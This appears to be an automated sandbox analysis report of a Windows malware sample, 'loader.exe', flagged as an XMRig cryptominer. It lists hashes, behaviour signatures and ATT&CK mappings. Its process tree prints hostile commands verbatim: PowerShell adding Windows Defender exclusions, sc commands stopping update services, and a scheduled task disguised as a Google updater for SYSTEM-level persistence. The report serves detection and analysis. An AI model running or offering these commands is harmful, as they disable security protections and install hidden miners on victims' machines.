Analysis
-
max time kernel
150s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
27/10/2024, 12:26
Static task
static1
Behavioral task
behavioral1
Sample
loader.exe
Resource
win7-20240903-en
General
-
Target
loader.exe
-
Size
56.5MB
-
MD5
cb5704b35d6f1420581b825a8faee883
-
SHA1
966b5157bd954ca13385db782b39ed56c5a52b9e
-
SHA256
6cf2cd2b186c6d10c081cb5afe7689d52b3ccc3da937c920718724c26573946a
-
SHA512
7276ed0bf256bc9895712c5de6d8c25851d867c62b2688d44e7cbd3ef63eeee0774345e3221665e3fb8e5a24343d7c45dafac7e308b1a67db24d8afab0ce91cb
-
SSDEEP
786432:brZMUVo6ix6I/AXpORG0zC5lYSI0yhRaJ9r3uXSr7dcS1Se34sey66TM0Mg0G+/c:bAwIcpIGsERI0puXSr7qS1eGsO+/QD
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description pid Process procid_target PID 2424 created 1196 2424 loader.exe 21 PID 2424 created 1196 2424 loader.exe 21 PID 2424 created 1196 2424 loader.exe 21 PID 2424 created 1196 2424 loader.exe 21 PID 2532 created 1196 2532 updater.exe 21 PID 2532 created 1196 2532 updater.exe 21 PID 2532 created 1196 2532 updater.exe 21 PID 2532 created 1196 2532 updater.exe 21 PID 2532 created 1196 2532 updater.exe 21 -
Xmrig family
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral1/memory/2532-31-0x000000013FAC0000-0x0000000143350000-memory.dmp xmrig behavioral1/memory/1276-34-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1276-36-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1276-38-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1276-40-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1276-42-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1276-44-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1276-46-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1276-48-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1276-50-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1276-52-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1276-54-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2668 powershell.exe 2128 powershell.exe 3048 powershell.exe 1860 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2532 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 2736 taskeng.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2532 set thread context of 1308 2532 updater.exe 58 PID 2532 set thread context of 1276 2532 updater.exe 59 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe loader.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2060 sc.exe 2616 sc.exe 1332 sc.exe 3004 sc.exe 3032 sc.exe 2976 sc.exe 2552 sc.exe 384 sc.exe 2212 sc.exe 2160 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 6010c2846b28db01 powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2772 schtasks.exe 1352 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2424 loader.exe 2424 loader.exe 2128 powershell.exe 2424 loader.exe 2424 loader.exe 2424 loader.exe 2424 loader.exe 3048 powershell.exe 2424 loader.exe 2424 loader.exe 2532 updater.exe 2532 updater.exe 2668 powershell.exe 2532 updater.exe 2532 updater.exe 2532 updater.exe 2532 updater.exe 1860 powershell.exe 2532 updater.exe 2532 updater.exe 2532 updater.exe 2532 updater.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe 1276 explorer.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2128 powershell.exe Token: SeDebugPrivilege 3048 powershell.exe Token: SeDebugPrivilege 2668 powershell.exe Token: SeDebugPrivilege 1860 powershell.exe Token: SeLockMemoryPrivilege 1276 explorer.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 2948 wrote to memory of 3004 2948 cmd.exe 33 PID 2948 wrote to memory of 3004 2948 cmd.exe 33 PID 2948 wrote to memory of 3004 2948 cmd.exe 33 PID 2948 wrote to memory of 3032 2948 cmd.exe 34 PID 2948 wrote to memory of 3032 2948 cmd.exe 34 PID 2948 wrote to memory of 3032 2948 cmd.exe 34 PID 2948 wrote to memory of 2060 2948 cmd.exe 35 PID 2948 wrote to memory of 2060 2948 cmd.exe 35 PID 2948 wrote to memory of 2060 2948 cmd.exe 35 PID 2948 wrote to memory of 2212 2948 cmd.exe 37 PID 2948 wrote to memory of 2212 2948 cmd.exe 37 PID 2948 wrote to memory of 2212 2948 cmd.exe 37 PID 2948 wrote to memory of 2160 2948 cmd.exe 38 PID 2948 wrote to memory of 2160 2948 cmd.exe 38 PID 2948 wrote to memory of 2160 2948 cmd.exe 38 PID 3048 wrote to memory of 2772 3048 powershell.exe 41 PID 3048 wrote to memory of 2772 3048 powershell.exe 41 PID 3048 wrote to memory of 2772 3048 powershell.exe 41 PID 2736 wrote to memory of 2532 2736 taskeng.exe 45 PID 2736 wrote to memory of 2532 2736 taskeng.exe 45 PID 2736 wrote to memory of 2532 2736 taskeng.exe 45 PID 2528 wrote to memory of 2616 2528 cmd.exe 50 PID 2528 wrote to memory of 2616 2528 cmd.exe 50 PID 2528 wrote to memory of 2616 2528 cmd.exe 50 PID 2528 wrote to memory of 2976 2528 cmd.exe 51 PID 2528 wrote to memory of 2976 2528 cmd.exe 51 PID 2528 wrote to memory of 2976 2528 cmd.exe 51 PID 2528 wrote to memory of 2552 2528 cmd.exe 52 PID 2528 wrote to memory of 2552 2528 cmd.exe 52 PID 2528 wrote to memory of 2552 2528 cmd.exe 52 PID 2528 wrote to memory of 384 2528 cmd.exe 53 PID 2528 wrote to memory of 384 2528 cmd.exe 53 PID 2528 wrote to memory of 384 2528 cmd.exe 53 PID 2528 wrote to memory of 1332 2528 cmd.exe 54 PID 2528 wrote to memory of 1332 2528 cmd.exe 54 PID 2528 wrote to memory of 1332 2528 cmd.exe 54 PID 1860 wrote to memory of 1352 1860 powershell.exe 57 PID 1860 wrote to memory of 1352 1860 powershell.exe 57 PID 1860 wrote to memory of 1352 1860 powershell.exe 57 PID 2532 wrote to memory of 1308 2532 updater.exe 58 PID 2532 wrote to memory of 1276 2532 updater.exe 59 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3004
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3032
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2060
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2212
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2160
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ljqsmfm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2772
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2616
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2976
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2552
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:384
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1332
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ljqsmfm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1352
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:1308
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8A0881F9-F0BB-46B3-9769-F037743EFCAD} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2532
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD56391874f342672e5ed0919522f561490
SHA1edcb23d4c02ffd2358c46f7333bb29268d8c4e20
SHA2564a7acdb0dc77cb6ec4158b9c452c9ec870a043cc4b2e59a008abc4cb864a5b30
SHA512b6707b2276f8b644c3dac86455c9a513d4471c1616a9d2e4734033f01b6730b156538c913cfbf9850628122bdb32c9139d4c9604c7531937528d814bc38ff400